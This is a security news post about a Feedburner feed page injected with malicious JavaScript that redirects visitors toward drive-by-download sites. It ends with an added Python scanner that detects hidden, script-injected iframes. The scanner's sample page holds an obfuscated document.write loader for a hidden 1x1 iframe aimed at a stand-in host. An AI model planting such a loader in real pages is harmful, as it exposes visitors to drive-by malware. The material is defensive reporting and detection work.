Feedburner Feed Rigged with Malicious JavaScript

Note: This post contains website URLs that may not be safe to visit, but are shared for educational purposes and have been modified to prevent accidental click-throughs. Do NOT visit the URLs.

It appears that cybercriminals are abusing Feedburner in order to conduct drive-by-download attacks.

Zscaler researchers found malicious JavaScript on feeds.feedburner.com/bileblog containing an iFrame designed to redirect visitors to a series of booby-trapped websites.

Once a user visits the compromised Feedburner feed page, the JavaScript code will execute, injecting the iFrame and redirecting the user to an intermediate website before ultimately redirecting the user to fukbb[.]com.

Fukbb[.]com did not serve any malicious content at the time of the report, but it has been flagged for suspicious activity in the past. A VirusTotal scan of fukbb[.]com shows that the domain was first scanned in July 2013.

Zscaler ThreatLabZ reported the compromised page to Feedburner on 12/26/13. The malicious JavaScript is still present as of 1/2/14. Although the infection method is unclear, the ‘bileblog’ feed appears to be the only one hosting the malicious JavaScript code.

Some antivirus solutions may detect the malicious JavaScript code as JS/Exploit-Blacole.em.

Attacks in which malicious JavaScript is injected into legitimate websites to push users towards drive-by-download attacks are becoming increasingly common. “Most of the time the infected sites haven’t specifically been targeted, but have become infected during larger attacks conducted using browser exploit kits designed to automate the infection of as many sites as possible,” Pradeep Kulkarni explained on the Zscaler blog.

Although it may not always seem necessary, users are advised to check URLs against a reputation service such as VirusTotal before visiting them, especially if anything about the URL looks suspicious. Browser extensions that block script execution by default, like NoScript for Firefox or NotScript for Chrome, also reduce the chance that injected JavaScript of this kind ever runs.
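As an added example (not code from Zscaler or the original post), the following Python script checks a fetched page body for the injection pattern described above: an inline script that writes a hidden, off-site iFrame into the page at load time. It parses the markup without executing any JavaScript, so it can be run against the content of a suspicious URL retrieved with a non-browser client (curl, urllib) instead of visiting the URL in a browser, and it records a fingerprint of the body so a later check can tell whether the injection is still present. The trusted-host allowlist, the sample page and the hostname intermediate.example are assumptions constructed for this example.

```python
"""Scan a fetched page for injected drive-by iframes without rendering it.

Added example, not code from Zscaler or the original post. Pass the raw page
body to scan_page(); the page's JavaScript is never executed, the scanner only
looks for the injection pattern: a script that writes a hidden, off-site iframe.
"""
import hashlib
import re
from urllib.parse import unquote, urlparse

# Hosts a FeedBurner feed page is expected to embed content from (assumption for this example).
TRUSTED_HOSTS = {"feeds.feedburner.com", "feedburner.google.com"}

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
SIZE_RE = re.compile(r"""\b(?:width|height)\s*=\s*["']?(\d+)""", re.I)
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
# Runtime DOM writes and the light obfuscation typically wrapped around injected loaders.
RUNTIME_RE = re.compile(r"document\.write|innerHTML|appendChild", re.I)
OBFUSC_RE = re.compile(r"\bunescape\s*\(|fromCharCode|\beval\s*\(", re.I)


def defang(url):
    """Render a URL so it cannot be clicked by accident (hxxp://, host with [.])."""
    p = urlparse(url)
    prefix = p.scheme.replace("http", "hxxp") + "://" if p.scheme else "//"
    return f"{prefix}{p.netloc.replace('.', '[.]')}{p.path}"


def _iframe_findings(fragment, page_host, where, base_reasons):
    """Flag iframes in `fragment` that are off-site, hidden, or carry `base_reasons`."""
    out = []
    for tag in IFRAME_RE.findall(fragment):
        m = SRC_RE.search(tag)
        src = m.group(1) if m else ""
        host = urlparse(src).hostname or page_host  # relative/srcless iframes are same-origin
        reasons = list(base_reasons)
        if host not in TRUSTED_HOSTS and host != page_host:
            reasons.append("off-site")
        if HIDDEN_RE.search(tag) or any(int(n) <= 1 for n in SIZE_RE.findall(tag)):
            reasons.append("hidden")  # 1x1 or invisible frames exist only to load something
        if reasons:
            out.append({"where": where, "src": defang(src) if src else "",
                        "host": host, "reasons": reasons})
    return out


def scan_page(html, page_url):
    """Return suspicious iframes found in the static markup and inside inline scripts."""
    page_host = urlparse(page_url).hostname
    findings = []
    # 1. Iframes present in the markup itself (script bodies removed so they are not double-counted).
    findings += _iframe_findings(SCRIPT_RE.sub("", html), page_host, "markup", [])
    # 2. Iframes assembled inside <script> blocks: percent-decode the body so that
    #    unescape("%3Ciframe ...") becomes a visible <iframe ...> tag.
    for body in SCRIPT_RE.findall(html):
        decoded = unquote(body)
        base = []
        if RUNTIME_RE.search(decoded):
            base.append("script-injected")
        if OBFUSC_RE.search(decoded):
            base.append("obfuscated")
        findings += _iframe_findings(decoded, page_host, "script", base)
    return findings


def page_fingerprint(html):
    """SHA-256 of the body, kept between checks to see whether an injection persists."""
    return hashlib.sha256(html.encode("utf-8")).hexdigest()


# Constructed sample modelled on the pattern described in the post; not the real feed page.
SAMPLE_PAGE = """<html><head><title>Bile Blog</title></head><body>
<div class="entry">Legitimate feed content</div>
<iframe src="http://feeds.feedburner.com/widget" width="300" height="250"></iframe>
<script type="text/javascript">
var s = unescape("%3Ciframe src=%22http://intermediate.example/x.php%22 width=1 height=1 style=%22visibility:hidden%22%3E%3C/iframe%3E");
document.write(s);
</script>
</body></html>"""


if __name__ == "__main__":
    for f in scan_page(SAMPLE_PAGE, "http://feeds.feedburner.com/bileblog"):
        print(f["where"], f["src"], ", ".join(f["reasons"]))
    print("fingerprint", page_fingerprint(SAMPLE_PAGE)[:16])
```

On the sample the legitimate 300x250 FeedBurner widget frame is ignored, while the percent-encoded, document.write-injected 1x1 frame pointing at intermediate.example is reported as script-injected, obfuscated, off-site and hidden. Fetch the body with a non-rendering client and keep the fingerprint alongside the findings so a follow-up check, like the one on 1/2/14 above, can show whether the page was cleaned.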
